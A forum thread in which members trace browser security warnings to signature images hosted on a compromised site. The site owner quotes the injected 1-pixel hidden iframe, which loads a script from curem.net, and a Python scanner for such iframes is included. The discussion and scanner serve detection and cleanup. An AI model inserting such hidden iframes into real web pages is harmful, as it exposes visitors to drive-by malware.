Question Anyone else getting a security warning here in OF?

HarvesteR

Hi,

Is it just me, or is anyone else getting browser security warnings every now and then here on the forums?

Sometimes, when I click on a link at the main page's update board, Chrome gives me a red screen saying the site has content from unrealaddicts.com, which is identified as a malicious site...

I'm quite sure there is nothing wrong here in OF, so I was wondering what could be triggering that warning... could it be some ad banner or something like that? (which would be strange, since I never saw an ad banner here) :p

Cheers
 

DaveS

> I'm getting that too, but for me it only happens here

The Google security warning is triggered by some users' signature images that are hosted on unrealaddicts.com. This could be fixed by the affected users simply uploading their signature images someplace else.
 

orb

> I'm getting that too, but for me it only happens here

I got the same security warning for that thread and only that thread in Chromium yesterday. There were no warnings for other pages. I looked at the HTML code of it, but I couldn't find anything suspicious. All other browsers I have (Firefox, Opera, Safari, K-Meleon, IE) display that page without any warnings.
 

orb

The issue should be fixed now. If you find any other thread with this warning please post a link to it in this thread.
 

Xyon

No warning in either thread just now on Chrome 12.0.742.30 dev-m.
 

Eli13

I've gotten it in all the places previously mentioned. Brand new Chrome, just updated. Well, not anymore thanks to Orb.
 

Kveldulf

Just got the warning again. Same details (something hosted on unrealaddicts). Found it on the last page of the Demotivators thread.
 

Bonanza123d

> I got the same security warning for that thread and only that thread in Chromium yesterday. There were no warnings for other pages. I looked at the HTML code of it, but I couldn't find anything suspicious. All other browsers I have (Firefox, Opera, Safari, K-Meleon, IE) display that page without any warnings.

You're not the only one that is a developer. I will keep an eye out on these security warnings.
 

orb

> Just got the warning again. Same details (something hosted on unrealaddicts). Found it on the last page of the Demotivators thread.

You should get no warning now. The post causing that warning has been temporarily taken out of view, until pictures from it are uploaded to another server.
 

RisingFury

Hi!

The security warnings come from www.unrealaddicts.com, where I've uploaded the OBSP sigs for myself, Lunar_Lander, escapetomsfate, T.Neo and Kaito. It seems that someone flagged the website as a security risk. My guess is that's either because the vBulletin forum is down, or someone just freaked out when they saw the error...

I currently don't have access to the FTP until the weekend so I'll take care of it on Friday. I apologize to everyone that's been inconvenienced by this and I'd like to assure you that I haven't uploaded anything that could compromise your security.

I've asked the OF staff to remove the signatures from the members above, in case they haven't done it yet. I'd also like to urge you to avoid threads where I've posted any images. Most of them are in the 'RC DeltaGliderIV' thread and a few are in the 'Orbiter demotivators' thread...

Again I apologize for this inconvenience, I'll sort it out on Friday.
 

orb

> Hi!
>
> The security warnings come from www.unrealaddicts.com, where I've uploaded the OBSP sigs for myself, Lunar_Lander, escapetomsfate, T.Neo and Kaito.

Signature of escapetomsfate is safe as it was uploaded to Orbiter-Forum, and Kaito's signature doesn't use that picture.
 

RisingFury

It seems I've identified the most likely cause for the Google freakout on my website:

Code:
<iframe heigth="1" width="1" frameborder="0" src="http://curem.net/t.php?id=2848724"></iframe>

Anyone have a clue how in hell that got into my index.php file?! It's definitely not a line I wrote. Everything I write is within the <?php ?> tags.


Only a few people have access to the FTP, but I doubt any one of them put this line of code on my website. How the hell does an external entity get access to my files?


I'm going to contact the main admin, but given that the UT community isn't what it used to be, I hope I can get a hold of him...


For now, I've removed the line. I'm going to look through the remainder of the code if there's anything there, but given that all of the content is in XML files and being read by the code, there's thankfully not much to look through.


Given the large amount of web-savvy people we have on OF, hopefully someone can provide an answer to my question...
 

orb

> Only a few people have access to the FTP, but I doubt any one of them put this line of code on my website. How the hell does an external entity get access to my files?

They didn't put that themselves (the code got injected without their knowledge), but it could be done with the help of malware that got installed on a computer that accessed the website via FTP (the password might be logged and sent to the place from where the code has been injected, or the code has been injected directly from the computer which accessed the FTP).

Make sure all the people who have access rescan their computers for viruses/trojans, then the FTP password will need to be changed and every file on the server checked for such iframes, as well as for unknown JavaScript, Flash or Java embedded objects, etc.

You can get more information about this infection when you search on Google for: curem.net iframe.
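
The file check described in the post above, as an added example (not part of the original post and not code from anyone in the thread): it walks a web root and reports every iframe whose src points off-site, marking those that are 1 pixel in size or hidden by CSS. The `own_hosts` allowlist, the function names and the sample markup are assumptions constructed for illustration.

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeFinder(HTMLParser):  # collects iframes whose src is off-site
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}
        self.hits = []  # (line, host, looks_hidden)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        try:
            host = (urlparse(a.get("src", "").strip()).hostname or "").lower()
        except ValueError:  # malformed URL: report it rather than crash
            host = "(unparseable)"
        if not host or host in self.own_hosts:
            return  # relative or same-site frame
        # Browsers ignore a misspelled attribute such as "heigth", so check
        # width and height separately: either at 0 or 1 hides the frame.
        tiny = any(a.get(k, "").strip().rstrip("px") in ("0", "1")
                   for k in ("width", "height"))
        style = a.get("style", "").replace(" ", "").lower()
        hidden = tiny or "display:none" in style or "visibility:hidden" in style
        self.hits.append((self.getpos()[0], host, hidden))

def scan_text(text, own_hosts):
    finder = IframeFinder(own_hosts)
    finder.feed(text)
    finder.close()
    return finder.hits

def scan_tree(root, own_hosts, exts=(".php", ".html", ".htm")):
    """Return (path, line, host, looks_hidden) for every hit under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += [(path, *h) for h in scan_text(fh.read(), own_hosts)]
    return findings

# Constructed sample modelled on the injected line quoted in the thread.
SAMPLE = ('<html><body>\n<iframe heigth="1" width="1" frameborder="0" '
          'src="http://injected.example/t.php?id=1"></iframe>\n'
          '<iframe width="560" height="315" src="/player.php"></iframe></body></html>')
```

Run `scan_tree()` against a downloaded copy of the site rather than the live server, and review every off-site hit by hand, since legitimate embeds are reported too.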
 

RisingFury

I've already requested the lead admin change all FTP passwords and shut down any inactive FTP accounts... I've gone through the server and located several files that were added, .htaccess, .php as well as thousands of html files which I'm unable to delete.

Hopefully the lead admin can correct this. I've already begun backing up all the vital files and I scanned this computer - no viruses detected, unfortunately...
 